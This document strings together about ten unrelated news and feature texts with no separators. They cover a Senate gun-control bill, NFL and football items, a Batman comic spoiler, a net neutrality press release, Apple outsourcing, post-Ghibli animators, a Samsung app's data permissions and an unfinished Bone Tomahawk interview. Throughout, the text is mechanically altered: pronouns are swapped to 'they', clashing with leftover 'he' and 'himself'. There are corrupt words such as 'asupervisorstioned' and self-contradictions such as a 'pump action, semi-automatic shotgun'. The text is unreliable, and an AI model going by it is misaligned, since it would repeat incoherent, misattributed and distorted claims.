To gun control advocates, banning assault weapons makes a lot of sense. If the bill were to become law, it would restrict every type of weapon used in America's two worst gun tragedies over the past eight months.
An AR-15 semi-automatic rifle using magazines holding 30 rounds was used to murder the 20 children along with six adults inside Newtown's Sandy Hook Elementary School. A similar AR-15 semi-automatic rifle, this one equipped with a 100-round drum magazine, was used in Aurora, Colorado, to kill movie goers until the weapon jammed; then the shooter switched to a Glock .40 caliber pistol with a 22 round magazine. The movie theater shooter first opened fire with a pump action, semi-automatic shotgun, firing six rounds. They killed 12 people and wounded 58 others in the Aurora movie theater.
But opposition to the bill among Senate Republicans is so strong that the GOP may filibuster to prevent it from even reaching a vote.
Earlier this week the Senate committee passed another bill in a vote along the same party lines that would apply universal background checks to private gun sales. That would help curb the flow of handguns reaching inner cities across the nation, in addition to staunching the illegal sales of both handguns and rifles across the border into Mexico, according to the bill's supporters and its sponsor, Sen. Chuck Schumer.
An ABC News-Washington Post poll released this week shows that 91% of Americans favor universal background checks. But opponents like the ranking Republican on the committee, Chuck Grassley of Iowa, argue that the bill would place an undue burden on private gun sales while still failing to stop criminals from obtaining guns.
Last week the committee passed a gun trafficking bill, this time with Sen. Grassley crossing the aisle to vote with Democrats in favor of the legislation. The bill would outlaw “straw” purchases, made when an individual buys a weapon on behalf of someone like a convicted felon who cannot legally purchase firearms.
For each bill passed by the committee, said Everitt, of the Coalition to Stop Gun Violence, “what we want is a vote on the Senate floor.”
But while these bills move to the full Senate, Republicans on both the Senate and House appropriations committees have written four provisions into emergency spending bills that could help undermine the ability of law enforcement agencies to track illegal gun sales, as reported Wednesday by The New York Times. The four provisions were temporary before, but now they are likely to become permanent if they are passed as part of legislation to keep the federal government running until Sept. 30.
The provisions would restrict the Bureau of Alcohol, Tobacco, Firearms and Explosives (the main federal agency charged with enforcing the nation's gun laws) from requiring gun dealers to conduct annual inventories that agents could inspect to ensure that weapons have not gone missing. Nor could the ATF refuse to renew a firearms dealer's license for lack of business or evidence of significant recorded gun sales, a technique used to clamp down on dealers who may be using a license mainly as a cover for unrecorded gun sales.
Another provision stuck into the spending bill would prohibit the ATF from analyzing data about gun sales and violence to “draw broad conclusions about firearms-related crimes.” Yet another provision would permanently expand the definition of “antique” firearms that could allow the importation of older weapons that currently cannot be legally purchased in the nation.
The same provisions have been included in appropriations bills on a temporary basis for nearly a decade. But now Senate Democrats have agreed to make them permanent under pressure from Republicans as Congress works to avoid the so-called sequester or automatic spending cuts that would go into effect at the end of this month.
The Senate Judiciary Committee did pass one bill last week related to gun violence that may well make it into law. The School Safety Enhancements Act would expand Justice Department grants to help local officials better secure schools with resources including tip lines, surveillance equipment and more secure entrances.
HATTIESBURG, Miss. -- Indianapolis Colts owner Jim Irsay posted on their Twitter account that they were in Brett Favre's hometown, but the quarterback's agent says they have not heard of any interest from the team.
The Colts owner might have just been taking their Twitter followers for a ride. The team said Monday it was "99.5 percent" sure that Irsay was not in Hattiesburg on Sunday.
The 41-year-old Favre retired in the offseason after a 20-year career and lives in Hattiesburg, but Irsay appears to be sniffing around because Peyton Manning had neck surgery in May and hasn't played in the preseason, casting doubt on their availability for the start of the season. Manning has played in 227 consecutive games.
"Brad, I'm in Hattiesburg ... is it right or left at the Firechief?" Irsay tweeted Sunday, presumably referring to former Minnesota Vikings coach Brad Childress, who traveled to Mississippi last July when they tried to convince Favre to return for the 2010 season.
Warning: This article will definitely spoil the events of Batman #40.
Scott Snyder and Greg Capullo wrapped up their big “Endgame” storyline in today's Batman #40, and the issue's ending has left many fans stunned.
The issue ended with a climactic battle between Batman and the Joker inside a cave containing a cure for the Joker's plague. The two fought until near death and the Joker detonated the cave. Satisfied that he'd saved their city once again, Batman accepted their fate and the two were buried in the cave in. The issue makes it seem like Batman and the Joker are both dead, and Snyder confirms that this is indeed the case.
“So what I'm saying is, yes, they're dead -- and they went into it ready to die; so there's no sort of trick to it,” Snyder tells IGN. Of course, Snyder acknowledged that nobody really stays dead in superhero comics, and teases stories ahead.
PRESS RELEASE: Fight for the Future delivers 75,000 signatures to President Obama demanding they support Title II net neutrality and replace failed FCC Chairman Tom Wheeler
FOR IMMEDIATE RELEASE
Friday, October 31st
Media Contact:
Tiffiniy Cheng, 413-367-6255
Email: press@fightforthefuture.org
Fight for the Future delivers 75,000 signatures to President Obama demanding they support Title II net neutrality and replace failed FCC Chairman Tom Wheeler
Internet activists are outraged by so-called “hybrid” proposal reported by Wall Street Journal that would allow for fast lanes and slow lanes.
WASHINGTON – Today, digital rights group Fight for the Future – best known for their pivotal role in major Internet protests like the SOPA Blackout and the Internet Slowdown – electronically delivered more than 75,000 signatures to President Barack Obama calling for the White House to publicly support full Title II reclassification and demote FCC Chairman Tom Wheeler for failing to do their job protecting the public's access to a free and open Internet.
The delivery came just hours after the Wall Street Journal reported that Wheeler is close to finalizing a net neutrality proposal that would explicitly allow for Internet fast lanes and slow lanes, despite the fact that the FCC has received more than 3.7 million public comments opposing the fast lanes, overwhelmingly in support of banning so-called “paid prioritization” through the use of Title II reclassification.
“The Internet will never accept this sham proposal – it's a middle finger to the American public and Internet users around the world,” said Holmes Wilson, co-founder of Fight for the Future, “Four a million people came out opposing fast lanes, and then the FCC proposes fastlanes. It's an outrage.”
“President Obama risks becoming the poster child for modern corruption. They appointed a former cable industry lobbyist to chair the FCC who has been doing the Cable industry's bidding,” said FFTF's other co-founder Tiffiniy Cheng, “If the FCC goes with the proposal detailed in the Wall Street Journal and fails to protect the most basic principles of the open Internet, that failure rests with the Obama administration. ”
Following today's petition delivery calling for Wheeler's removal from the FCC Chairmanship, Fight for the Future announced plans for a series of escalating actions targeting both the White House and the FCC.
The group is currently running a campaign at CallTheFCC.com, which allows Internet users to enter their phone number and call a random top-level employee at the FCC. The page has already driven more than 10,000 phone calls to the FCC, and more than 700 committed activists have signed up to call the FCC every day from now until they announce their net neutrality decision.
Fight for the Future and other groups are also planning an Emergency Protest at the White House on Thursday, November 6th. Inspired by massive protests against a proposed Internet Tax in Hungary, the organizers are calling for participants to hold their phones aloft as a symbol of protest against the gutting of Internet freedom.
“We're just getting started – the public is outraged and our actions will reflect that,” added Evan Greer, FFTF's Campaign Director, “If President Obama and Tom Wheeler think they can fool the Internet public into accepting a fake proposal that destroys net neutrality, they are sorely mistaken, and with elections coming up, their party may pay the ultimate political price.”
A visit by Apple's CIO to India in January has resulted in some hefty software deals for two Bangalore-based firms, according to The Times of India.
Apple's top internal software guy, Niall O'Connor, met with executives from India-based Infosys and Wipro on a visit to Bangalore from 29 to 31 January – and apparently some juicy contracts have resulted, the English-language daily reports.
The Times reckons Apple currently outsources $100m worth of back-end software to India, but over the next few years will increase the investment to $400m.
Both Infosys and Wipro already have contracts with Apple. According to the paper, Infosys – which boasts of its "15-year association" with Apple on its website – currently provides $50m worth of software services to Apple, while Wipro tests apps for the company. The Register spoke to a spokesperson at Wipro, who confirmed that Apple is a client, but would not detail what software or services the company provides for Cupertino.
Multi-million dollar investments aside, the other benefit of working with Apple is the advantage that the name gives the businesses in attracting other clients. The Times of India report quoted an insider as saying:
Working with Apple on its internal IT has benefits beyond just the immediate business. With many outsourcing customers now ready to pay for projects that integrate iPads and iPhones with business applications, the learning goes a long way in winning other projects.
A phone call to Apple's Bangalore office resulted in a no comment on Apple's current investment in India or on any planned future investment. However, the press officer did confirm that they too had seen the Times of India article.
Emails to Wipro and Infosys haven't given The Reg any clarity on the issue either, though Apple often builds secrecy pacts into its contracts.
A further incentive for Apple to keep schtum about the new Bangalore contract is that it is already suffering criticism for outsourcing its hardware jobs to China. If more of the software jobs start going to India, the fruity firm could come in for for some more flack from the American press.
In their time at Apple, O'Connor has brought in improved customer service, tightened data warehousing and reporting and overseen the retail systems that support sales in Apple stores, according to this profile. Their biggest achievement is seen as implementing SAP software across Apple – tightening up its supply chain and helping it manage resources and planning. ®
Limerick FC have announced the signing of 24-year old defender Mick Leahy from UCD for the 2014 season.
The former UCD captain has agreed terms on a one-year deal with the Shannonsiders and has become Stuart Taylor's second new arrival after Shane Duggan was unveiled last month.
After playing underage football for Belvedere, the centre half joined UCD in the summer of 2007.
Leahy's League of Ireland debut was ironically against Limerick FC – the opening game of UCD's First Division campaign in 2009.
Leahy's presence was certainly felt at Belfield – they went on to captain the Students in 2011 after having two successful seasons with the club.
Soon establishing themselves as first-choice centre half at Belfield, Mick went onto make thirty appearances that year before impressing further in 2012.
The 2013 season was cut short for them though – the UCD graduate missed a large chunk of the year through injury and only returned to action in August with a 3-1 over Bohemians.
Read Extratime.ie columnist Mick Leahy's two-part series on the UCD Development Model here - Part 1 | Part 2
Studio Ghibli's announcement that they were halting regular operations in 2014 hit mainstream sources as hard as any piece of anime news ever could. It was such a big deal that the discourse understandably revolved around what this would mean for the industry as a whole, but that also means a smaller scale issue was mostly overlooked: Miyazaki was retiring and Takahata on their way out, but what about everyone else at the studio?
Artists need to keep on working, and perhaps more importantly, they want to. Ghibli's actual full-time employees weren't going to get fired en masse, but if they had the drive to keep on creating then they would need to seek something else. We're talking about immensely talented people so finding new jobs wasn't going to be an issue, but of course they weren't going to accept just about anything; even the affected people who weren't exclusively tied to Ghibli were, for the most part, theatrical sphere creators. Despite the manufacturing process being essentially the same, there's a massive difference between working on TV anime and doing so on movies, especially if you're used to Ghibli's conditions. And that means that the industry as a whole, still greatly focused on TV series by volume despite recent trends, didn't really benefit from this development. Though that doesn't mean there were no exceptions, of course. Look no further than the Ghibli legend Megumi Kagawa: they worked exclusively for the studio since the 80s save for a couple of small lapses, but recently went entirely freelance and did some animation on Little Witch Academia TV #1. Isolated cases aside however, the fact that Ghibli creators have attempted to move towards other anime film productions is clear.
Some of Megumi Kagawa's work on The Wind Rises.
Within this changing landscape, Your Name's timing was impeccable, even if by sheer chance. The first meetings for the project occurred in 2014 and the production itself started in early 2015, making it a succulent target for Ghibli refugees. And those didn't only come, but made sure to leave their imprint. The movie's only unit director, thus boasting quite the influence, was the ex-Ghibli Kenji Imura. They joined the studio as a producer and eventually developed a bit of a directional career spawning from that, which led to them handling some of the Ghibli Museum shorts and even acting as assistant director on the likes of Ponyo. After their sort-of-demise they have been more open to working on TV series than most – they were active in Tomino's G-Reco and recently showed up on Attack on Titan Season 2 – but Your Name was by far their biggest endeavor after becoming freelance. And if they were a notable figure during the film's production, then Masashi Ando's presence was simply essential. The Ghibli-bred animator is one of the few artists in the field with enough acclaim to have their name brandished as a promotional asset. They joined them in 1990, as part of a new crop of geniuses alongside Kenichi Yoshida. Ando fully embraced the careful depiction of life that defined the studio, and they reciprocated by trusting them as animation director on historic hits like Princess Mononoke and Spirited Away. It seemingly was their pursue of realism in animation that caused them to confront Hayao Miyazaki and, as that tends to go, they left the studio. Ando then became one of Satoshi Kon's best allies, even serving as character designer in Paranoia Agent and Paprika. Kon's death forced them to find new main occupations again (he didn't have the best of luck in this regard, as their mentor while at Ghibli Yoshifumi Kondo also died prematurely), but the fame he'd earned easily allowed them to find high-profile work. After bouncing around genuine milestones for the Japanese animation industry, something incredible happened – leaving grudges aside, Ando returned to Ghibli. They were one of the main animators in Isao Takahata's Kaguya-hime, and they animated, supervised and even contributed to the script of When Marnie Was There. Sadly the studio ceased operations right after they returned, forcing them to once again relocate. And there came Your Name.
The reason we constantly point out that anime is sustained by an intricate net of acquaintances is embodied by the effect Masashi Ando had here. Their mere presence enabled the arrival of dozens of animators who used to work exclusively with Ghibli, as well as artists simply linked to the studio like himself; the asupervisorstioned Megumi Kagawa, Takeshi Inamura, Atsuko Tanaka, Hideki Hamasu, Hiroko Minowa, Shunsuke Hirota, Naoko Kawahara, the list goes on and on. This congregation of skilled people also caused another well-known industry development – if you want a term for it, let's call it the talent magnet. As long as it's open to freelancers, any project that accumulates enough high-profile names becomes exponentially more attractive to their similarly skilled peers; directors and animators talk amongst themselves constantly, so industry members are always fairly up-to-date when it comes to succulent opportunities. And so new waves of excellent animators kept on arriving to Your Name. Some of them could still be traced back to Ando – like the master of realistic animation Hiroyuki Okiura – but plenty of them were simply industry celebrities like Norio Matsumoto, Kazuchika Kise, Takashi Hashimoto, Naoki Kobayashi or even Atsushi “goripon” Nishigori. What started with an ex-Ghibli animator joining the project led to a veritable avalanche of talent. This is the true Post-Ghibli Industry effect.
Whether you find these behind the scenes movements interesting or not, they would be mere trivia if they didn't have a direct effect on the works themselves. Fortunately, Your Name happens to be the culmination of Makoto Shinkai's recent move towards character expression matching the intensity of the feelings they pour into their films, and it was in no small part thanks to that effect. I suppose it's a bit of a controversial take to say that Shinkai's works were poorly animated, since most fans still immediately associate that with how pretty they perceive things to be. Make no mistake though, they definitely were weak. The character animation in particular was incredibly poor, which is quite the issue for someone who made movies all about people's feelings. Their most famous film prior to this, 5 Centimeters per Second, might as well have been starred by pieces of wood. The Garden of Words didn't fare much better, still lacking any semblance of acting. And if you go back enough with movies like Place Promised in Our Early Days, the situation is an outright disaster. Shinkai's work had for the longest time been at its most eloquent when not focusing on its characters, but that obviously wasn't by design; their excellent environmental expression stems from the fact that he's a one-man army creator that always heavily leaned towards background art and photography, but those propensities are also the root of their issues with animation. Without an ally on that front, their craft was fundamentally flawed.
And that's where Masayoshi Tanaka enters the picture. Their first collaboration with Shinkai – the delightful commercial Crossroad – quite literally brought life to their characters. As a director they obviously didn't need to get rid of their striking illustration-like worlds, but to actually populate them. And Tanaka's characters are nothing if not alive; their previous theatrical project Anthem of the Heart revolved around a girl who couldn't normally express their emotions, so the staff needed them to genuinely act to make the character work – its success with this tricky challenge speaks volumes of Tanaka's aptitude. On Your Name they acted as the main designer with the support of Masashi Ando, and their output enabled some spectacular work. The film's careful body language when dealing with the swapping, the playful yet restrained deformations, the realistic body motion when needed and everything else the film had to offer are all resources Shinkai never had at their disposal, and that I will love to explore at a later date. While on a much smaller scale, some solid animators had worked on their films before. But without malleable designs and the willingness of a supervisor to make them act, it all fell flat. Tanaka and Ando provided that, then the very capable crew did their part to elevate the film. It's not that much of a surprise that this movie has connected with many more people than their previous works when the whole cast is, on a fundamental craft level, much easier to empathize with. These are partnerships Shinkai should definitely want to maintain.
As excellent of a concrete example as Your Name has been though, there obviously is more to this Post-Ghibli climate. Mamoru Hosoda and their studio Chizu are always an important factor, since he's collaborated with those artists in the past and the chances for that will increase tenfold for their next film Mirai. And it would be beyond careless to neglect the company's most natural successor: Studio Ponoc, founded by ex-Ghibli producer Yoshiaki Nishimura alongside Hiromasa Yonebayashi and a few more creators with past at the studio. Their very name is an allusion to this, as the term – literally midnight in serbo-croat – signifies the start of a new day; it's as much of a beginning as an acknowledgement of what came before, fitting a new studio that has clearly inherited Ghibli's aesthetic sensibilities and even their modus operandi. Their first feature film Mary and the Witch's Flower is based on Mary Stewart's children's novel The Little Broomstick after all, which immediately brings to mind the kind of source material that Ghibli sought. While the movie has yet to premiere, it's obvious that artists who used to be affiliated to the studio have been working on it – even those whose links was very tenuous, since the latest promotional videos seem to feature the work of Shinya Ohira. This should come as no surprise, but Neo-Ghibli will also attract many creators who used to work with them and want to return to a similar space.
And if we're talking about studios capable of attracting Ghibli creators, how about…well, Ghibli itself. Just yesterday they started recruiting new people for Hayao Miyazaki's last-but-for-real-feature-film after all; they are specifically targeting youngsters to join as in-betweeners and background artists, though showing no willingness to adapt to the new realities of anime production. Don't even think about joining if you're a digital animator! It's likely then that the film will end up being carried by the old guard in the end, especially if they consider it their last chance to bid farewell to Miyazaki. Returning home even if simply for a last time, moving to a studio that is similar to where they used to work, or embarking in exciting freelance ventures like Your Name – the truth is that there are many possibilities for the creators who used to work at arguably the most important anime production company. The loss of the studio was a painful one for this industry, but the Post-Ghibli panorama is undoubtedly exciting. It hasn't caused the sudden influx of talent for the industry as a whole that some people dreamed about, but its positive effect on the theatrical space is now a reality rather than optimistic speculation. Even if you're in the minority and weren't enthused by Your Name, you can at least consider its existence positive proof of that.
Support us on Patreon for more analysis, translations, staff insight and industry news, and so that we can keep affording the increasing costs of this adventure. Thanks to everyone who's allowed us to keep on expanding the site's scope!
In a promotion for its Galaxy phones, Samsung announced it would deliver a million free copies of Brooklyn rapper Jay-Z's new album days before its official release. But it did so using a spyware Android app designed to track your location and harvest phone numbers you call, your device ID and which apps you use.
Source: Google Play
"Its an ugly piece of software."
Samsung-style Free and Open
I read this and........"Naw I'm cool" pic.twitter.com/x8fXPG1tvC  Killer Mike (@KillerMikeGTO) July 2, 2013
Free love, NSA
I will tell your friends you love us
Fed-style surveillance on your open platform
With official Samsung Android apps like these, who needs malware authors?
Samsung's free Android mobile app "Jay-Z Magna Carta" only works with select models, specifically the new Galaxy S 4, Galaxy S III, Galaxy Note II. But as New York Times music critic Jon Pareles wrote , "Its an ugly piece of software."Samsung paid $5 million for the early distribution rights of the "Magna Carta Holy Grail" album, which ironically comes from an artist with lyrics that are "indignant about phone surveillance and bribing witnesses," Pareles stated.The singer's 2010 track "Jays Back ASAP" complained, "They tap, them feds dont play fair/They pay rats to say that theyre part of your operation."Taking advantage of Google's "Trojan Horse" Android security model, the Samsung app simply demands access to a broad range of rights on the user's phone before allowing installation, even though all it really does is play back the album. It does not add the songs to a user's music library.This includes tracking users' "precise GPS location." The app permissions page is so unnecessarily invasive that fellow rapper Killer Mike tweeted in response, "I read this and 'Naw I'm cool.'"Unlike Apple's iOS, installed Android apps don't have to alert the user or ask for permission when they want to track the GPS location or access contacts or social network accounts, and there's actually provisions for apps to access users' phone call information and running apps. iOS is an app platform, not an ad platform.Pareles added, "it demands permissions, including reading the phones status and identity." On Android, this includes obtaining a unique device ID that can be used by advertisers like a web cookie (but not eased by the user), but also includes collecting the user's phone number, tracking when the phone is in use on a call, and even "the remote number connected by a call."In contrast, Apple has been incrementally working to increase users' privacy on iOS, warning developers in 2011 that they needed to stop relying upon iOS users' Unique User IDs because they would no longer be available. iOS 6 removed UUID access , effectively terminating OS-wide user tracking by ad networks.In place of UUID, Apple's iOS 6 turned the tables to introduce an " Advertising Identifier ," which serves as "a non-permanent, non-personal device identifier, that advertising networks will use to give you more control over advertisers' ability to use tracking methods."Samsung's new app "also gathers 'accounts,' the e-mail addresses and social-media user names connected to the phone," Pareles added. "When installed, it demanded a working log in to Facebook or Twitter and permission to post on the account."In order to "unlock" lyrics within the app, users must tweet out a promo for each song on the album they want to read."Its telling that Jay-Z  who boasts regularly about their millions of sales  and Samsung didnt simply trust fans to post or tweet on their own," Pareles wrote.Additionally, the app also demands permission to "retrieve running apps," which means it can "discover information about which applications are used on the device," another feature Google supports as a common permission on Android apps.Why Samsung's "free" album app would need to track the GPS location, phone numbers, phone calls, social accounts and installed apps on users' phones is questionable enough, but even more interesting is that Android supports and enforces such invasive "app distributor's rights.""On some level, Jay-Z knows better. A streak of paranoia has been running through their lyrics for years," Pareles wrote, citing a line from Somewhere in America that says, Feds still lurking/They see Im still putting work in."Yet now, its Jay-Z whos lurking  in my phone," they added. "Another song, 'Nickels and Dimes,' insists, 'The greatest form of giving is anonymous to anonymous.' For the gift of the album, fans arent anonymous to Jay-Z now. Hes another data miner, gathering more than half a million e-mail and social-media accounts. Maybe they should send us an apology."The app's rollout wasn't without flaw either, Pareles noted. "The app didnt deliver my album for more than hour after it was supposed to be available. Jay-Zs sponsors at Samsung proved themselves not only intrusive, but technically inept."Earlier this week, Bluebox Labs noted a security flaw that can enable anyone to surreptitiously replace a vendor' trusted installed apps with a rogue version that the Android OS can't identify as corrupted, therefore gaining widespread access to spy on the user.However, given Samsung's first party spyware tool disguised as a free album, users don't have to worry about rogue malware developers snooping on their activities, calls, apps and location. They're already being exploited by their phone's maker and the operating system it runs, which are optimized for data collection and remote monitoring.
LISTEN: Matt Maiocco, CSN Bay Area 49ers beat writer Your browser does not support the audio element.
Arizona Cardinals players may consider San Francisco as one of their top rivals, but a reporter who covers the 49ers says the feelings aren't mutual.
The 49ers hold a 26-17 all-time record against the Cardinals since the two franchises first met in 1951. The Niners swept the season series in 2012 and have won seven of the last eight games over Arizona.
The two NFC West teams head into Week 6 with an identical record (3-2) and are getting ready to face each other on Sunday at Candlestick Park in San Francisco.
“I don't sense that there's a huge amount of credence being placed on the rivalry aspect of this game,” Comcast Sportsnet Bay Area reporter Matt Maiocco told Arizona Sports 620's Dan Bickley with Vince Marotta Friday. “Right now it seems like it's the 49ers and the (Seattle) Seahawks.
Maiocco said they think rivalries in the NFC West seem to be based on how much of threat another team poses, rather than any geographic considerations. San Francisco and Seattle were largely were picked by most experts to contend for the division title, so it makes sense if their rivalry is stronger at this point.
Maiocco added that the 49ers-Cardinals rivalry might have been stronger “a couple years ago,” such as when the Cardinals still had quarterback Kurt Warner.
San Francisco has a winning record at this point, but it hasn't been easy getting there. The team won its season opener against Green Bay, but then lost to Seattle and Indianapolis in Weeks 2 and 3. The Niners then turned around and won their next two games against St. Louis and Houston.
“I think if you had asked a lot of people, ‘What will be the 49ers' record after five games?,' I think probably the majority of them would have come up with a 3-2 record,” Maiocco said. “I think how they've gotten there is a little bit different than how many people had kind of thought it would be.
“In my own mind, I thought the 49ers would be making that transition — as far as an identity — from a defensive team of the past to more of a dynamic, fireworks-on-offense kind of team. And that hasn't simply been the case.”
The writer said the team has been hurt by injuries in its receiving corps, but the returns of Michael Crabtree and Mario Manningham later this season should make the passing game formidable.
“So the 49ers have a chance, if they can stay healthy, of being in much better shape roster-wise with the passing game than they have been in the last two (postseasons),” Maiocco said. “They should be a stronger team late in the season than they have been through this first part of the season.”
Maiocco also said the two-game losing streak was the 49ers' first under head coach Jim Harbaugh, and it brought their record under .500 for the first time with them as well.
Maiocco explained how the Niners turned it around.
“They got back to basics. They became a run-first team. They ran the ball; they stopped the run on defense; they grinded out a couple wins there,” they said. “And now they're back on track. And, yes, there's been a lot of adversity on the field and off the field, but I think Jim Harbaugh and their staff have done a pretty good job of keeping it all together.”
Delivering the Beats: Bone Tomahawk
S. Craig Zahler discusses the western and horror genres, offers advice for aspiring writers, and explores the similarities between writing and drumming.
By Ramona Zacharias.
Craig Zahler is a man of many talents. Besides being an accomplished novelist, screenwriter, director and cinematographer, he's also a self-professed metalhead as the drummer, lyricist and singer for the band Realmbuilder. Not surprisingly, Zahler's many passions have combined to make them an extremely interesting storyteller. He's taught themselves how to put content fit for a novel into a screenplay and applied lessons learned from their drumming to better their writing style, making both obvious and obscure connections between their various careers.
And over the course of their screenwriting career in particular, Zahler has learned much about the movie business. With some 20-plus screenplays having either been optioned or sold and not one actually made in Hollywood, they are familiar with the frustrations facing many writers. Their approach? Write what you love, don't do what you're not keen on and whenever possible, make it happen for yourself. Their latest effort is the grisly western flick Bone Tomahawk, which they both wrote and directed. Starring Kurt Russell, Richard Jenkins and David Arquette, the film is certified fresh on Rotten Tomatoes at a favorable critic rating of 88% with Zahler in particular being praised by both critics and audiences alike for their unconventional approach to a classic genre.
Refreshingly candid about their experiences, Zahler chatted about Bone Tomahawk and what they have found works for them in terms of both project and industry.
Let's start by talking about the genre, which appears to be a blending of western and horror. Do you find the two naturally lend themselves to each other?
For me, the movie is a western. And everything that I write has comedy in it. It's sort of the backbone of what I do. I feel a lot of movies are a little too monochromatic when they just show a world that is serious all the time.
I enjoyed The Wrestler, but I think it would have been better if it had had about ten more scenes like the one where he's throwing the lunchmeat on the counter. It just brightens it and it's not so monotonous. I think that was something that was really terrible about the movie Precious, which I think is just terrible – it's just monotonously mean.
The other thing that is in almost all of my work is horror. I like to have those sequences and my process is very much one of surprising myself every day that I write. So when it gets dark, it tends to get really dark.
If I write a western or if I write a crime piece – and I've written a lot of both of those at this point – it's going to go really dark. And I think that's why the horror thing comes up. For me, the movie is kind of a classic western, in terms of the fact that it's an adventure of people on the frontier…with the frontier as basically a moral and physical crucible for the protagonists. But then when it gets dark, it gets really dark.
So I understand why most people I speak to talk about it as a blending of genres…but I just see it as a western where, when you're dealing with the enemies, it goes further than you would expect. But I do the same thing with my crime pieces and I'd expect that if I made one of them into a movie, it would get the same kind of classification. Like the movie Se7en – really atmospheric and scary, but to me it feels like it's a crime movie. It's just that when it gets dark and nasty, it's darker and nastier than others.
The opening scene is quite gruesome and really sets the tone for the rest of the film. How important is it to start off your story with a visual that striking?
My hope is that you see that opening scene and you have some idea of what you're in for. Obviously the shot is a bit of a rough one to open the movie with and that gives you some sense of where it's going to go eventually. But then there's a fair amount of character stuff with dialogue…and perhaps an audience that is informed by a preview or synopsis will know that the two characters in the opening scene aren't the protagonists. But I'm setting it up and spending an amount of time with them where they could be.
The ideal situation for me is if the viewer goes in knowing very little about the movie, or possibly nothing about the movie other than what it's called. So the scene sets that up, but it also sets up the idea that we're going to spend time with people, hear them talk, and get a sense of their lives outside the movie. Which is certainly something that I feel is missing from a lot of 90-minute studio movies. Giving you a sense of the world outside the story and spending some time with them.
Where that scene goes obviously lets you know that the world of the movie itself is not safe, and that anyone that you spend any amount of time with may not survive. I'm trying to set all that up there, and I think it has a couple of surprises. You spend a fair amount of time with the characters, you hear a lot of that idiosyncratic dialogue that fills the movie and then you also get some of the horror atmosphere that is in it. So I feel that in a way, it's like a little sampler plate for the movie that's to come. I think it's pretty important to have an opening scene that's strong and brings people in.
As you mentioned, there is a real focus on the dialogue between the characters and there are often long periods of conversation that break up the action sequences. Tell me a little bit about your process and how you pace yourself to include as much dialogue as you need to properly develop the characters.
My writing process is that I know where I'm going at all times and it's open to avenues in different directions. In some ways I'm a bit better suited for writing novels than scripts…it's always a bit of a struggle for me with any piece that has a lot of content to get it into screenplay size. To decide how many details I want to include and which are the most important ones. The process of writing for me is one of surprising myself every single day that I do it and also of not finishing the day until I've written pages that I think are good.
So with this you're looking at basically the first draft and the same can be said of most of my screenplays that are out there – and when I say first draft, I mean that the story I wrote the first time through is the story that's there at the end. I spend a lot of time polishing the prose and doing that sort of thing, but it's an enjoyable process for me.
There's a camping scene where all of a sudden the character Chicory (Richard Jenkins) is talking about how to read a book in the bathtub. I didn't know that's what they were going to talk about until it happened. And to have a character like that who's pretty complicated…someone who has a thought process that isn't focused and who does have some degree of what's probably senility in there…and whose filter is down for them in terms of the fact that they speak and says what he's thinking…it's a real pleasure to write a character like that. They're going to surprise you pretty much every day you write them. Such was the case with that character from the get-go.
This is the fifth western I've written – since my initial two screenplays that were westerns, I wrote two novels. It is a world that I'm comfortable dealing with, characters that I'm comfortable dealing with and a type of dialogue I enjoy writing. And certainly the adventure component is really enjoyable and a large part of the reason I like writing the genre.
Do you find that the genre is lacking in Hollywood?
I set up my career as a writer and got a three-picture deal on a western that I wrote in 2006. I've watched a number of people come and go on that. It's a script called “The Brigands of Rattleborge”, and at different times Tom Cruise, Brad Pitt and Leonardo DiCaprio – to name three – were all interested in that movie. I'd actually done development notes for both DiCaprio and Cruise on it…and I watched different directors come and go.
The problem with westerns in Hollywood is that there's the perception they won't make money. My feeling is that perception is the biggest obstacle, because what happens then is the people in Hollywood only get behind westerns that have a gimmick. But I can tell you I did not see Jonah Hex. At some point, people had approached me to work on it but I didn't even want to see what that end product was. Same thing with Cowboys & Aliens, also for which people had approached me because they knew that I was a western guy. I saw a preview for that movie and knew that I had no interest in watching it.
So the westerns that they're doing are turning off actual western fans – I don't know many western fans who saw either of those movies. But certainly there was a gimmick and something new that people could say “well this is why these will do well”.
Maybe they're not going to make a western that's going to make a hundred million dollars, so maybe they should just scale the budgets accordingly. But Hollywood is moving more and more towards just making gigantic movies like Fast & Furious and Transformers kind of things that make gigantic numbers. Because why bother to make 5 or 10 twenty-million dollar movies that are going to make 30 million dollars when you can make one huge movie that's going to then make a huge sum on it.
Of course I wish that weren't the case…but the track record for westerns in Hollywood wasn't good and then it looked even worse when they made these giant budget gimmick westerns that did terribly. So there hasn't been a lot there in recent years, but this year it looks like a few are coming out. Obviously there's this one, though this is certainly an independent movie and has some Hollywood people in it.
But there's The Hateful Eight and The Revenant…so hey, if a few of these do well, then all of a sudden there should be a mini resurgence. Because if there's one thing that Hollywood does, it's follow trends.
Given some of the restrictions we've discussed in terms of the industry, do you have any advice for aspiring screenwriters?
My advice on screenwriting is going to be dubious, because I break most of the rules in my screenwriting. My prose is clearly the prose of a novelist. At this point in time, I've had maybe a minimum of 21 different screenplays optioned or sold, and not one of them was made in Hollywood.
I had one made by a French company in Belgium, but the other 20 or more – and some of those have been optioned multiple times, I had a television series that was at FX that went to Starz that went to AMC – none of them have been made. So my advice isn't great or especially worth taking in terms of if someone wants to be successful.
I've made money doing this and that made me comfortable enough to continue to just do exactly what I want and hope people are interested. It's also made me financially comfortable so I can spend a lot of time writing novels, of which I've written eight and I have a couple of new ones that I'm about to take around.
So my advice would be to write what you enjoy…but at the same time, that's tough advice to someone who's really looking to break in and make a living doing it. I didn't move to Los Angeles when most of my friends from NYU did. And I was ok to not have a living in the film industry.
I like writing books. I'm a metalhead and I've played in a bunch of different metal bands. And I'm still, as of last month, recording heavy metal stuff. I was ok to not be involved with the film stuff because books and music are both equally important to me.
The advice I would still give is write what you enjoy, because if you write something that you like and it doesn't go anywhere, at least it's not a soulless experience. You've written something that you can stand behind.
Any my other advice would be, don't count on any one thing to land, because in my experience of 20-plus pieces getting optioned or sold in Hollywood and not seeing any of them made, the odds are against every piece. So just keep generating material and don't be overly precious with any single one of them.
I'm sure some people have had the very different experience of selling one thing to Hollywood and it gets made and the doors are opened…and that might work if that person's writing particularly commercial material or they just happen to hook up with the right team that gets their stuff done. But with me, I'd say any advice I give to a screenwriter is kind of questionable. Because it seems I write stuff that a lot of people love to buy or option and then it just becomes toilet reading in Hollywood.
I'm writing for myself first and foremost and I have enough supporters that I'm able to generate income doing it…but if the end goal is turning these things into movies or television shows, which it is for me, I haven't hit that other than once with the French company and in the case of Bone Tomahawk, where I went and directed my own movie. Certainly some of the frustration with watching so many pieces of mine go sit on studio shelves and with different finance companies is what led me to go and do Bone Tomahawk in the first place.
Finally, do you find that your career as a musician ever infiltrates your writing style?
